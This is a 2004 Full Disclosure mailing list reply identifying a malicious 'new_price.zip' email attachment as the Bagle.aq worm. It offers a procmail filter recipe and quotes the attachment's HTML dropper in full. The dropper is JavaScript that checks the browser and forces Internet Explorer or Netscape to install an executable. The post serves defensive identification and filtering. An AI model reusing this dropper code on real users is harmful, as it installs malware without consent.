Full Disclosure mailing list archives
Re: (no subject)
From: Tremaine <tremaine () gmail com>
Date: Mon, 9 Aug 2004 15:29:23 -0600
On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut <jgrotegut () directpointe com> wrote:
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut
Bagle.aq with mitgleider-like dropper Procmail recipe (courtesy of offlist associate), use at your own risk. [code] :0 BD * -1000^0 * 300^0 YJuA6wS8WsBr * 300^0 zGzjbJDCLB96 * 300^0 BOSKHdXH8Blw * 300^0 dEi3loqk64su * 300^0 byusWle0odyf /dev/null [/code] price dot html file included in zip: [code] <head> <script language="JavaScript"> var exepath='price/price.exe'; </script> <SCRIPT LANGUAGE="JavaScript"> <!-- var bname=navigator.appName; sewre = "rseI"; var bver=parseInt(navigator.appVersion); function install() { if ( navigator.platform && navigator.platform != 'Win32' ) { location.replace('NOTWIN32WARNING.html'); return; } if (bname == 'Microsoft Internet Explorer' && bver >= 2) { document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d 3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>'); } else if (bname == 'Netscape' && bver >= 4) { trigger = netscape.softupdate.Trigger; if (trigger.UpdateEnabled) { trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE) } else { location.replace(exepath); } } else { location.replace(exepath); } } install(); // --> </script> </head> [/code] Definitions available on McAfee and Trend Micro, and it appears Symantec should have something by about 6pm. -- Tremaine IT Security Consultant _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: (no subject), (continued)
- Re: (no subject) Micheal Espinola Jr (Aug 09)
- Re: (no subject) Michael (Aug 09)
- Re: (no subject) Bob Kehr (Aug 09)
- RE: (no subject) Bart . Lansing (Aug 09)
- Re: (no subject) Micheal Espinola Jr (Aug 09)
- RE: (no subject) Shannon Johnston (Aug 09)
- RE: (no subject) Eric Paynter (Aug 09)
- Re: (no subject) Dave King (Aug 09)
- Re: (no subject) Michael Erdely (Aug 09)
- Re: (no subject) van Helsing (Aug 09)
- Re: (no subject) Tremaine (Aug 09)
- Re: New virus Alan J. Wylie (Aug 09)
- RE: (no subject) Corey Hart (Aug 09)
- (no subject) Dufresne (Aug 09)
- RE: (no subject) Seamus Hartmann (Aug 09)
- RE: (no subject) Stephen Agar (Aug 09)
- RE: (no subject) Todd Towles (Aug 09)
- RE: (no subject) Michael Poulin - Home Office (Aug 09)
- Re: (no subject) tcleary2 (Aug 10)
- Re: (no subject) Marek Isalski (Aug 10)
- (no subject) phoenix (Aug 11)
(Thread continues...)